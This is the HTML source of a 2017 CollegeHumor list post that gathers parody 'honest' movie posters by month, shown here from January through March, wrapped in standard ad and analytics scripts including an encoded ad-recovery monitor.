<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
		<!-- Adonis observer.min.js --><script>/* observer-7.0.2 */eval(atob("IWZ1bmN0aW9uIHQoZSxuLG8pe2Z1bmN0aW9uIHIoYSxzKXtpZighblthXSl7aWYoIWVbYV0pe3ZhciB1PSJmdW5jdGlvbiI9PXR5cGVvZiByZXF1aXJlJiZyZXF1aXJlO2lmKCFzJiZ1KXJldHVybiB1KGEsITApO2lmKGkpcmV0dXJuIGkoYSwhMCk7dmFyIGQ9bmV3IEVycm9yKCJDYW5ub3QgZmluZCBtb2R1bGUgJyIrYSsiJyIpO3Rocm93IGQuY29kZT0iTU9EVUxFX05PVF9GT1VORCIsZH12YXIgYz1uW2FdPXtleHBvcnRzOnt9fTtlW2FdWzBdLmNhbGwoYy5leHBvcnRzLGZ1bmN0aW9uKHQpe3ZhciBuPWVbYV1bMV1bdF07cmV0dXJuIHIobj9uOnQpfSxjLGMuZXhwb3J0cyx0LGUsbixvKX1yZXR1cm4gblthXS5leHBvcnRzfWZvcih2YXIgaT0iZnVuY3Rpb24iPT10eXBlb2YgcmVxdWlyZSYmcmVxdWlyZSxhPTA7YTxvLmxlbmd0aDthKyspcihvW2FdKTtyZXR1cm4gcn0oezE6W2Z1bmN0aW9uKHQsZSxuKXsidXNlIHN0cmljdCI7ZnVuY3Rpb24gbyh0KXt2YXIgZT0iTkVXX1NDUklQVF9FVkVOVCIsbj1uZXcgcihlLHtkZXRhaWw6e319KTt0LmRpc3BhdGNoRXZlbnQobil9dmFyIHI9dCgzKTtlLmV4cG9ydHM9b30sezM6M31dLDI6W2Z1bmN0aW9uKHQsZSxuKXsidXNlIHN0cmljdCI7ZnVuY3Rpb24gbyh0KXt0LmFkb25pcz10LmFkb25pc3x8e30sdC5hZG9uaXMuc2NyaXB0U3RhdHVzZXM9e30sdC5hZG9uaXMucmVxdWVzdFN0YXR1c2VzPXt9O3ZhciBlPXQuWE1MSHR0cFJlcXVlc3QucHJvdG90eXBlLm9wZW47dC5YTUxIdHRwUmVxdWVzdC5wcm90b3R5cGUub3Blbj1mdW5jdGlvbihuLG8pe3RoaXMuYWRkRXZlbnRMaXN0ZW5lcigiZXJyb3IiLGZ1bmN0aW9uKGUpezA9PT10aGlzLnN0YXR1cz90LmFkb25pcy5zY3JpcHRTdGF0dXNlc1tvXT0iZXJyb3IiOnQuYWRvbmlzLnNjcmlwdFN0YXR1c2VzW29dPSJsb2FkIn0pLHRoaXMuYWRkRXZlbnRMaXN0ZW5lcigibG9hZCIsZnVuY3Rpb24oZSl7dC5hZG9uaXMuc2NyaXB0U3RhdHVzZXNbb109ImxvYWQifSksdGhpcy5hZGRFdmVudExpc3RlbmVyKCJsb2FkZW5kIixmdW5jdGlvbihlKXt0LmFkb25pcy5yZXF1ZXN0U3RhdHVzZXNbb109dGhpcy5zdGF0dXMscih0KX0pO3ZhciBpPVtdLnNsaWNlLmNhbGwoYXJndW1lbnRzLDApO3JldHVybiBlLmFwcGx5KHRoaXMsaSl9fXZhciByPXQoMSk7ZS5leHBvcnRzPXt3cmFwWE1MSHR0cFJlcXVlc3Q6b319LHsxOjF9XSwzOltmdW5jdGlvbih0LGUsbil7KGZ1bmN0aW9uKHQpe2Z1bmN0aW9uIG4oKXt0cnl7dmFyIHQ9bmV3IG8oImNhdCIse2RldGFpbDp7Zm9vOiJiYXIifX0pO3JldHVybiJjYXQiPT09dC50eXBlJiYiYmFyIj09PXQuZGV0YWlsLmZvb31jYXRjaChlKXt9cmV0dXJuITF9dmFyIG89dC5DdXN0b21FdmVudDtlLmV4cG9ydHM9bigpP286InVuZGVmaW5lZCIhPXR5cGVvZiBkb2N1bWVudCYmImZ1bmN0aW9uIj09dHlwZW9mIGRvY3VtZW50LmNyZWF0ZUV2ZW50P2Z1bmN0aW9uKHQsZSl7dmFyIG49ZG9jdW1lbnQuY3JlYXRlRXZlbnQoIkN1c3RvbUV2ZW50Iik7cmV0dXJuIGU/bi5pbml0Q3VzdG9tRXZlbnQodCxlLmJ1YmJsZXMsZS5jYW5jZWxhYmxlLGUuZGV0YWlsKTpuLmluaXRDdXN0b21FdmVudCh0LCExLCExLHZvaWQgMCksbn06ZnVuY3Rpb24odCxlKXt2YXIgbj1kb2N1bWVudC5jcmVhdGVFdmVudE9iamVjdCgpO3JldHVybiBuLnR5cGU9dCxlPyhuLmJ1YmJsZXM9Qm9vbGVhbihlLmJ1YmJsZXMpLG4uY2FuY2VsYWJsZT1Cb29sZWFuKGUuY2FuY2VsYWJsZSksbi5kZXRhaWw9ZS5kZXRhaWwpOihuLmJ1YmJsZXM9ITEsbi5jYW5jZWxhYmxlPSExLG4uZGV0YWlsPXZvaWQgMCksbn19KS5jYWxsKHRoaXMsInVuZGVmaW5lZCIhPXR5cGVvZiBnbG9iYWw/Z2xvYmFsOiJ1bmRlZmluZWQiIT10eXBlb2Ygc2VsZj9zZWxmOiJ1bmRlZmluZWQiIT10eXBlb2Ygd2luZG93P3dpbmRvdzp7fSl9LHt9XSw0OltmdW5jdGlvbih0LGUsbil7InVzZSBzdHJpY3QiO2Z1bmN0aW9uIG8odCxlLG4sbyl7ImFkZEV2ZW50TGlzdGVuZXIiaW4gdD90LmFkZEV2ZW50TGlzdGVuZXIoZSxuLG8pOiJhdHRhY2hFdmVudCJpbiB0JiZ0LmF0dGFjaEV2ZW50KCJvbiIrZSxuKX12YXIgcj10KDIpLGk9dCgxKTshZnVuY3Rpb24oKXt3aW5kb3cuYWRvbmlzPXdpbmRvdy5hZG9uaXN8fHt9LHdpbmRvdy5hZG9uaXMuc2NyaXB0U3RhdHVzZXM9e30sci53cmFwWE1MSHR0cFJlcXVlc3Qod2luZG93KSxvKGRvY3VtZW50LCJsb2FkIixmdW5jdGlvbih0KXt0LnRhcmdldCYmIlNDUklQVCI9PT10LnRhcmdldC5ub2RlTmFtZSYmKHdpbmRvdy5hZG9uaXMuc2NyaXB0U3RhdHVzZXNbdC50YXJnZXQuc3JjXT0ibG9hZCIsaSh3aW5kb3cpKX0sITApLG8oZG9jdW1lbnQsImVycm9yIixmdW5jdGlvbih0KXt0LnRhcmdldCYmIlNDUklQVCI9PT10LnRhcmdldC5ub2RlTmFtZSYmKHdpbmRvdy5hZG9uaXMuc2NyaXB0U3RhdHVzZXNbdC50YXJnZXQuc3JjXT0iZXJyb3IiLGkod2luZG93KSl9LCEwKX0oKX0sezE6MSwyOjJ9XX0se30sWzRdKTs="));</script>
    	<!-- Begin: Taboola Recommendations (loader) -->
	<script type="text/javascript">
	  window._taboola = window._taboola || [];
	  !function (e, f, u, i) {
	    if (!document.getElementById(i)){
	      e.async = 1;
	      e.src = u;
	      e.id = i;
	      f.parentNode.insertBefore(e, f);
	    }
	  }(document.createElement('script'),
	  document.getElementsByTagName('script')[0],
	  '//cdn.taboola.com/libtrc/connectedventure-collegehumor/loader.js',
	  'tb_loader_script');
	</script>
	<!-- End: Taboola Recommendations (loader) -->
    <link rel="shortcut icon" href="/favicon.ico">
	<link rel="canonical" href="http://www.collegehumor.com/post/7054446/if-every-movie-this-year-had-honest-posters">
	<meta property="og:locale" content="en_US">
	<meta property="og:site_name" content="CollegeHumor">
	<meta property="fb:app_id" content="271750421132">
	<meta property="fb:pages" content="6363207806">
	<meta name="twitter:site" content="CollegeHumor">
	<meta name="robots" content="index, follow, noodp, noydir">
	<meta property="article:author" content="https://www.facebook.com/AndrewBridgmanIsntFunny">
	<meta name="description" content="We made monthly round-ups of honest posters for the movies of 2017 (you can check out the monthly articles here), and wanted to celebrate the end of ... View &quot;If Every Movie This Year Had Honest Posters&quot; and more funny posts on CollegeHumor">
	<meta name="published_datetime" content="2017-12-29T08:00:00-05:00">
	<meta name="modified_datetime" content="2017-12-01T15:04:02-05:00">
	<meta name="publisher" content="CollegeHumor">
	<meta name="date" content="2017-12-29">
	<meta name="keywords" content="post">
	<meta name="twitter:card" content="summary_large_image">
	<meta name="content_format" content="List | Photoshopped">
	<meta name="sponsored" content="false">
	<meta name="sponsor_campaign" content="">
	<meta name="shelf_life" content="">
	<meta name="author" content="Andrew Bridgman">
	<meta name="contributors" content="Andrew Bridgman,Amir Khan">
	<meta name="vertical" content="moviestv">
	<meta name="source" content="original">
	<meta name="rating" content="pg">
	<meta name="main_topic" content="">
	<meta property="article:tag" content="post">
	<meta property="article:published_time" content="2017-12-29 08:00:00">
	<meta property="og:image" content="http://0.media.collegehumor.cvcdn.com/36/34/3f373ca11c23327cb86a0e8a8c803718-if-every-movie-this-year-had-honest-posters.jpg">
	<meta property="og:image:width" content="728">
	<meta property="og:image:height" content="1079">
	<meta property="og:title" content="If Every Movie This Year Had Honest Posters">
	<meta property="og:description" content="We made monthly round-ups of honest posters for the movies of 2017 (you can check out the monthly articles here), and wanted to celebrate the end of ...">
	<meta property="og:type" content="article">
	<meta property="og:url" content="http://www.collegehumor.com/post/7054446/if-every-movie-this-year-had-honest-posters">
	<title>If Every Movie This Year Had Honest Posters - CollegeHumor Post</title>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
	<link rel="apple-touch-icon" href="http://0.static.collegehumor.cvcdn.com/images/touch/touch-icon-60x60.png">
	<link rel="apple-touch-icon" sizes="76x76" href="http://1.static.collegehumor.cvcdn.com/images/touch/touch-icon-76x76.png">
	<link rel="apple-touch-icon" sizes="120x120" href="http://0.static.collegehumor.cvcdn.com/images/touch/touch-icon-120x120.png">
	<link rel="apple-touch-icon" sizes="152x152" href="http://1.static.collegehumor.cvcdn.com/images/touch/touch-icon-152x152.png">
	<link rel="alternate" href="http://www.collegehumor.com/post/7054446/if-every-movie-this-year-had-honest-posters" hreflang="en" /><link rel="alternate" href="http://www.collegehumor.com/post/7054446/if-every-movie-this-year-had-honest-posters" hreflang="en-us" /><link rel="alternate" href="http://www.collegehumor.com.au/post/7054446/if-every-movie-this-year-had-honest-posters" hreflang="en-au" /><link rel="alternate" href="http://www.collegehumor.com/post/7054446/if-every-movie-this-year-had-honest-posters" hreflang="x-default" />			    				<link rel="stylesheet" type="text/css" href="http://1.static.collegehumor.cvcdn.com/css/packages/08699ba2dde82c8c741af250d577e8e9.css">
	<noscript><link rel="stylesheet" type="text/css" href="http://1.static.collegehumor.cvcdn.com/jument/css/noscript.css"></noscript>
		<script type="text/javascript" src="http://0.static.collegehumor.cvcdn.com/js/packages/4541b5138bf3666f43eaa1f4d2aad1dc.js"></script>
	    					<script async src="https://www.googletagservices.com/tag/js/gpt.js"></script>
		<script async src="//cdn.adsafeprotected.com/iasPET.1.js"></script>
    	<!-- GPT and IAS -->
<script>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</script>
<!-- End: GPT and IAS -->    	<!-- Amazon A9 - APS Transparent Tag Marketplace -->
<script type='text/javascript'>
	!function(a9,a,p,s,t,A,g){if(a[a9])return;function q(c,r){a[a9]._Q.push([c,r])}a[a9]={init:function(){q("i",arguments)},fetchBids:function()
	{q("f",arguments)},setDisplayBids:function(){},_Q:[]};A=p.createElement(s);A.async=!0;A.src=t;g=p.getElementsByTagName(s)[0];g.parentNode.insertBefore(
	A,g)}("apstag",window,document,"script","//c.amazon-adsystem.com/aax2/apstag.js");
	// initialize apstag and have apstag set bids on the googletag slots when they are returned to the page
	apstag.init({
		pubID: '3436',
		adServer: 'googletag',
		bidTimeout: 2e3
		});
	// request the bids for the googletag slots
	apstag.fetchBids({ slots: [ 
			{slotID:'ad-below-navigation',sizes:[[300, 250]]},
			{slotID:'ad-right-rail-top',sizes:[[300, 250]]} 
		]}, function(bids) {
		console.log('apstag bids fetched! \n');
		console.dir(bids);
		// trigger the request to DFP
		googletag.cmd.push(function() {
		apstag.setDisplayBids();
		googletag.pubads().refresh();
		});
	});
</script>
<!-- End: Amazon A9 - APS Transparent Tag Marketplace -->    	<!--[if lt IE 9]>
		<link rel="stylesheet" href="/jument/css/ie8-and-below.css">
		<script src="http://0.static.collegehumor.cvcdn.com/jument/js/lib.html5shiv.js"></script>
		<script src="http://1.static.collegehumor.cvcdn.com/jument/js/lib.respond.min.js"></script>
	<![endif]-->
    <!-- Package Link Data JSON (ld+json) -->
    <script type='application/ld+json'>{"@context":"http://schema.org","@type":"Article","headline":"If Every Movie This Year Had Honest Posters","thumbnailUrl":"http://0.media.collegehumor.cvcdn.com/36/34/3f373ca11c23327cb86a0e8a8c803718-if-every-movie-this-year-had-honest-posters.jpg","image":{"@type":"ImageObject","url":"http://0.media.collegehumor.cvcdn.com/36/34/3f373ca11c23327cb86a0e8a8c803718-if-every-movie-this-year-had-honest-posters.jpg","width":"728","height":"1079"},"publisher":{"@type":"Organization","name":"CollegeHumor","logo":{"@type":"ImageObject","url":"https://media0ch-a.akamaihd.net/98/69/099aa49090aca85be0f9ee7233479df3.png","width":256,"height":60}},"dateCreated":"2017-12-29T08:00:00-05:00","datePublished":"2017-12-29T08:00:00-05:00","dateModified":"2017-12-01T15:04:02-05:00","creator":["Andrew Bridgman","Amir Khan"],"author":["Andrew Bridgman","Amir Khan"],"keywords":["tag - post","format - List | Photoshopped"],"url":"http://www.collegehumor.com/post/7054446/if-every-movie-this-year-had-honest-posters","mainEntityOfPage":"http://www.collegehumor.com/post/7054446/if-every-movie-this-year-had-honest-posters"}</script>	<!-- Publica (Recover your video advertising inventory) - COLLEGEHUMOR -->
	<script type="text/javascript">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</script>
	<!-- End: Publica - COLLEGEHUMOR -->
</head>
<body class="www ch notouch item post two-columns reading-list">
<!-- Adonis wrapper.min.js --><script>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</script>
	<!-- Begin comScore Tag -->
	<script> var _comscore = _comscore || []; _comscore.push({ c1: "2", c2: "6511178" }); (function() {var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })(); </script>
	<noscript><img src="https://sb.scorecardresearch.com/p?c1=2&amp;c2=6511178&amp;c4=https://www.collegehumor.com/post/7054446/if-every-movie-this-year-had-honest-posters" /></noscript>
	<!-- End comScore Tag --> 
        	<!-- Page hiding snippet (recommended) -->
<style>.async-hide { opacity: 0 !important} </style>
<script>
(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;
h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};
(a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);
})(window,document.documentElement,'async-hide','dataLayer',4000,{'GTM-KLD83T':true});
</script>
<!-- Note: Google Tag Manager ID for CollegeHumor = GTM-KLD83T -->	    <!-- Google Tag Manager for CollegeHumor (GTM-KLD83T) -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-KLD83T"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-KLD83T');</script>
<!-- End Google Tag Manager for CollegeHumor (GTM-KLD83T) -->    		<nav class="nav-menu ga-feature-usage" data-ga-feature="Navigation" data-ga-category="Navigation" role="navigation">
	<ul class="nav navbar-nav nav-tabs-11">
								<li class="videos dropdown ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Videos">
				<div class="nav-link-wrapper closed">
					<a   href="http://www.collegehumor.com/videos" class="dropdown-toggle" data-toggle="dropdown" data-ga-category="Navigation" data-ga-label="Videos" >Videos</a>
									<div class="caret-wrapper">
						<span class="caret"></span>
					</div>
					<div class="dropdown-menu ga-feature-usage" data-ga-feature="Navigation Dropdown" data-ga-category="Navigation">
						<ul>
														<li><a  href="http://www.collegehumor.com/originals" class="" data-ga-category="Navigation" data-ga-label="Videos: All Originals">All Originals</a></li>
														<li><a  href="http://www.collegehumor.com/tag/adam-ruins-everything" class="" data-ga-category="Navigation" data-ga-label="Videos: Adam Ruins Everything">Adam Ruins Everything</a></li>
														<li><a  href="http://www.collegehumor.com/badman" class="" data-ga-category="Navigation" data-ga-label="Videos: Batman">Batman</a></li>
														<li><a  href="http://www.collegehumor.com/hardlyworking" class="" data-ga-category="Navigation" data-ga-label="Videos: Hardly Working">Hardly Working</a></li>
														<li><a  href="http://www.collegehumor.com/jakeandamir" class="" data-ga-category="Navigation" data-ga-label="Videos: Jake and Amir">Jake and Amir</a></li>
													</ul>
					</div>
				</div>
						</li>
								<li class="comics dropdown ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Comics">
				<div class="nav-link-wrapper closed">
					<a   href="http://www.collegehumor.com/comics" data-ga-label="Comics" >Comics</a>
							</li>
								<li class="loverelationships dropdown ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Love/Relationships">
				<div class="nav-link-wrapper closed">
					<a   href="http://www.collegehumor.com/tag/love-romance" data-ga-label="Love/Relationships" >Love/Relationships</a>
							</li>
								<li class="moviestv dropdown ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Movies/TV">
				<div class="nav-link-wrapper closed">
					<a   href="http://www.collegehumor.com/tag/movies" data-ga-label="Movies/TV" >Movies/TV</a>
							</li>
								<li class="food dropdown ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Food">
				<div class="nav-link-wrapper closed">
					<a   href="http://www.collegehumor.com/tag/food" data-ga-label="Food" >Food</a>
							</li>
								<li class="wtf dropdown ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - WTF">
				<div class="nav-link-wrapper closed">
					<a   href="http://www.collegehumor.com/tag/wtf" data-ga-label="WTF" >WTF</a>
							</li>
								<li class="life dropdown ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Life">
				<div class="nav-link-wrapper closed">
					<a   href="http://www.collegehumor.com/tag/life" data-ga-label="Life" >Life</a>
							</li>
								<li class="politics dropdown ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Politics">
				<div class="nav-link-wrapper closed">
					<a   href="http://www.collegehumor.com/tag/politics" data-ga-label="Politics" >Politics</a>
							</li>
								<li class="all-articles dropdown ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - All Articles">
				<div class="nav-link-wrapper closed">
					<a   href="http://www.collegehumor.com/articles" data-ga-label="All Articles" >All Articles</a>
							</li>
								<li class="shop dropdown ga-feature-usage ga-interaction" data-ga-feature="Navigation Drop Down - Shop">
				<div class="nav-link-wrapper closed">
					<a   href="http://www.collegehumor.com/shop" data-ga-label="Shop" >Shop</a>
							</li>
			</ul>
</nav>
<div class="site-header-wrapper">
	<div id="ad-dynamic-header"><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-dynamic-header"); }); }</script></div>	<div id="ad-outstream"><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-outstream"); }); }</script></div>	<header class="navbar site-header" role="banner" style="">
		<div class="navbar-header cf">
			<input type="checkbox" id="nav-trigger" class="nav-trigger" />
			<label for="nav-trigger" class="expand-nav icon-hamburger menu-item ga-feature-usage ga-interaction ga-interaction-click-only" data-ga-feature="Open Menu"></label>
			<div class="logo-wrapper">
				<a href="/" class="logo navbar-brand ga-feature-usage ga-target-self" data-ga-feature="Logo" data-ga-category="Navigation" data-ga-label="CollegeHumor Logo" style="">CollegeHumor</a>
			</div>
			<div class="pull-right">
				<div class="desktop-nav-extras">
					<ul class="nav-share">
						<li class="nav-label">Follow</li>
						<li><a href="https://twitter.com/collegehumor" class="icon-twitter" target="_blank"></a></li>
						<li><a href="https://www.facebook.com/CollegeHumor" class="icon-facebook" target="_blank"></a></li>
						<li><a href="https://www.youtube.com/user/collegehumor" class="icon-youtube" target="_blank"></a></li>
					</ul>
				</div>
				<div class="ad"><div id="ad-nav-tab"><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-nav-tab"); }); }</script></div></div>
				<a href="#" class="search menu-item hide nav-search" data-show=".navbar-search" data-ga-category="Navigation" data-ga-label="Search Module"></a>
			</div>
		</div>
		<div class="navbar-form navbar-search" style="">
			<script>
			  (function() {
				var cx = '005471751329090648169:a1opraivv_0';
			    var gcse = document.createElement('script');
			    gcse.type = 'text/javascript';
			    gcse.async = true;
			    gcse.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') +
			        '//www.google.com/cse/cse.js?cx=' + cx;
			    var s = document.getElementsByTagName('script')[0];
			    s.parentNode.insertBefore(gcse, s);
			  })();
			</script>
			<gcse:search linktarget="_parent"></gcse:search>
		</div>
	</header>
</div>


		<div id="skin-wrapper">
				<div id="skin-banner" class="top-banner">
					<div class="ad-below-navigation-wrapper cf">
				<div id="ad-below-navigation" adonis-marker><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-below-navigation"); }); }</script></div>			</div>
			<div id="ad-skin"><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-skin"); }); }</script></div>			
		</div>
				<div class="container container-main">
						<div id="ad-left-gutter"></div>
						<div class="content cf">
					<script>if(typeof ga == 'function') { ga('send', 'event', 'Media', 'On Site View', '7054446', 1); }</script>

<script>
	var disable_twin_river_ads = 0;
</script>
<script type="text/javascript">
	// GTM dataLayer Push for GA Event Tracking of 'Reading List Started'
	if (typeof dataLayer !== 'undefined') {
		dataLayer.push({
			'event': 'gaTriggerEvent',
			'gaEventCategory': 'Reading List',
			'gaEventAction': 'Reading List Started',
			'gaEventLabel': window.location.href
		});
	}
</script>



<div class="col-sm-12 col-md-8">
	<div class="primary cf" data-url="/post/7054446/if-every-movie-this-year-had-honest-posters" data-node-id="7054446" id="7054446">
									<h1>If Every Movie This Year Had Honest Posters</h1>
		<div class="byline ga-feature-usage" data-ga-feature="Author Byline">
			<div class="author-avatar">
	<a href="/user/3322109">	<img src="http://0.static.collegehumor.cvcdn.com/jument/images/placeholders/125x125.png" width="125" height="125" class="img-responsive lazy" alt="Andrew Bridgman" data-src="http://2.media.collegehumor.cvcdn.com/40/35/2d7edda3a9e0e40dd2ae80c3d3b9b939.jpg" data-src-retina="http://1.media.collegehumor.cvcdn.com/40/35/d136cf9bab7cd41d4ee93bef80ff6529.jpg"/>
	<noscript>
		<img src="http://2.media.collegehumor.cvcdn.com/40/35/2d7edda3a9e0e40dd2ae80c3d3b9b939.jpg" width="48" height="48" alt="Andrew Bridgman"/>
	</noscript>
	</a></div>
<div class="author-info">
	<div class="authors">
						<span class="name"><a href="/user/3322109">Andrew Bridgman</a></span> and 										<span class="name"><a href="/user/6205444">Amir Khan</a></span>								</div>
			<div class="author-twitter">
			<a href="https://twitter.com/#!/PubeGoldberg">@PubeGoldberg</a>
		</div>
				<time class="date">December 29, 2017</time>
	</div>	</div>		<div class="post-content ">
			<h2 style="text-align: left;"><img src="https://media0ch-a.akamaihd.net/78/16/50e043ba1304fbda219c883b69427199.jpg" id="16467197" data-image-id="16467197" height="334" width="685" alt="undefined" data-frame="fullsize" /></h2>
<p><em>We made monthly round-ups of honest posters for the movies of 2017 (<a href="http://www.collegehumor.com/tag/honest-movie-titles-2017"><span style="text-decoration: underline;"><strong>you can check out the monthly articles here</strong></span></a>), and wanted to celebrate the end of the year by collecting EVERY honest movie poster for 2017 in one place! So enjoy the nearly 80 posters we made this year!</em></p>
<p></p>
<hr />
<p></p>
<h2 style="text-align: center;"></h2>
<h2 style="text-align: center;"><span style="text-decoration: underline;">JANUARY</span></h2>
<p><br /><br /></p>
<h2>xXx: The Return of Xander Cage</h2>
<p><img src="https://media0ch-a.akamaihd.net/86/52/eb2e271f91b4b829d41397213a61ff1c.jpg" id="16345535" data-image-id="16345535" height="937" width="600" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Underworld: Blood Wars</h2>
<p><img src="https://media0ch-a.akamaihd.net/22/39/fe5ffa61288b782f481de414aae778c4.jpg" id="16345539" data-image-id="16345539" height="1078" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Patriot's Day</h2>
<p><img src="https://media0ch-a.akamaihd.net/35/15/a69820e804ca7a987e0eba9ac192f1d0.jpg" id="16345538" data-image-id="16345538" height="984" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Live By Night</h2>
<p><img src="https://media0ch-a.akamaihd.net/40/83/ee8355fd32a76295c721b9be63085792.jpg" id="16345536" data-image-id="16345536" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>A Monster Calls</h2>
<p><img src="https://media0ch-a.akamaihd.net/92/14/837caf08dec6daeda26e4c12361f25b6.jpg" id="16345537" data-image-id="16345537" height="1072" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Split</h2>
<p><img src="https://media0ch-a.akamaihd.net/90/20/631fcc1cd414c3a04cae719560cfdd1d.jpg" id="16356459" data-image-id="16356459" height="1024" width="685" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Resident Evil: The Final Chapter</h2>
<p><img src="https://media0ch-a.akamaihd.net/15/97/9d9d9d1bfda1ae71eb7d3f8df0c8f18f.jpg" id="16345541" data-image-id="16345541" height="1024" width="692" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>A Dog's Purpose</h2>
<p><img src="https://media0ch-a.akamaihd.net/63/43/0885d721ba8d1ca0dbe1281838d0d6b8.jpg" id="16467121" data-image-id="16467121" height="1153" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /><br /></p>
<hr />
<p></p>
<p><br /><br /></p>
<h2 style="text-align: center;"><span style="text-decoration: underline;">FEBRUARY</span></h2>
<p><br /><br /></p>
<h2>John Wick: Chapter 2</h2>
<p><img src="https://media0ch-a.akamaihd.net/53/26/0c9fc23145dfe605c6a0307711d23a54.jpg" id="16361627" data-image-id="16361627" height="1033" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Fifty Shades Darker</h2>
<p><img src="https://media0ch-a.akamaihd.net/24/15/e8efa1471632f8ed88c44f850a6f3678.jpg" id="16361629" data-image-id="16361629" height="1153" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Get Out</h2>
<p><img src="https://media0ch-a.akamaihd.net/73/91/0fd1f36edf3c32b2a51e464729d12f43.jpg" id="16361628" data-image-id="16361628" height="1153" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>The Space Between Us</h2>
<p><img src="https://media0ch-a.akamaihd.net/64/73/20c400da790f7b8b3657d2471028319b.jpg" id="16361631" data-image-id="16361631" height="1078" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Rings</h2>
<p><img src="https://media0ch-a.akamaihd.net/41/58/88ac81597cc63907c3f8bea2580431bd.jpg" id="16361632" data-image-id="16361632" height="1137" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>The Great Wall</h2>
<p><img src="https://media0ch-a.akamaihd.net/90/37/379709be8ceb13c4afb543b923823d46.jpg" id="16361633" data-image-id="16361633" height="1148" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>The LEGO Batman Movie</h2>
<p><img src="https://media0ch-a.akamaihd.net/41/36/7e16850262d2311ed22d0991bca40b48.jpg" id="16361630" data-image-id="16361630" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<p></p>
<hr />
<p></p>
<h2 style="text-align: center;"><span style="text-decoration: underline;"><br />MARCH</span></h2>
<p><span style="text-decoration: underline;"> </span></p>
<h2>Kong: Skull Island</h2>
<p><img src="https://media0ch-a.akamaihd.net/56/61/b59673c9423c3214e897a08f674ef61b.jpg" id="16380767" data-image-id="16380767" height="695" width="700" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>The Boss Baby</h2>
<p><img src="https://media0ch-a.akamaihd.net/30/18/432fbe4ee2424e2e6838ee06c3726c72.jpg" id="16370301" data-image-id="16370301" height="998" width="700" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Life</h2>
<p><img src="https://media0ch-a.akamaihd.net/91/85/69facd6635a90d9280073c37e9cb5736.jpg" id="16370302" data-image-id="16370302" height="1037" width="700" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Power Rangers</h2>
<p><img src="https://media0ch-a.akamaihd.net/44/66/a52227ac1ad8dc7a78b67c740be05250.jpg" id="16370303" data-image-id="16370303" height="1078" width="700" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Beauty & The Beast</h2>
<p><img src="https://media0ch-a.akamaihd.net/54/61/1f759f3c0869ef9f52beb75ee5f41db7.jpg" id="16380787" data-image-id="16380787" height="1000" width="700" alt="If Movies Had Honest Posters (March 2017 Edition)" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Ghost in the Shell</h2>
<p><img src="https://media0ch-a.akamaihd.net/65/30/2df6087dcc2632f07512a13e4ab2bcda-if-movies-had-honest-posters-march-2017-edition.jpg" id="16370305" data-image-id="16370305" height="1037" width="700" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Logan</h2>
<p><img src="https://media0ch-a.akamaihd.net/81/78/12ac42344b3ad4e5ae0b94e3ed88a0bf.jpg" id="16370306" data-image-id="16370306" height="1061" width="700" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<hr />
<p></p>
<p></p>
<p></p>
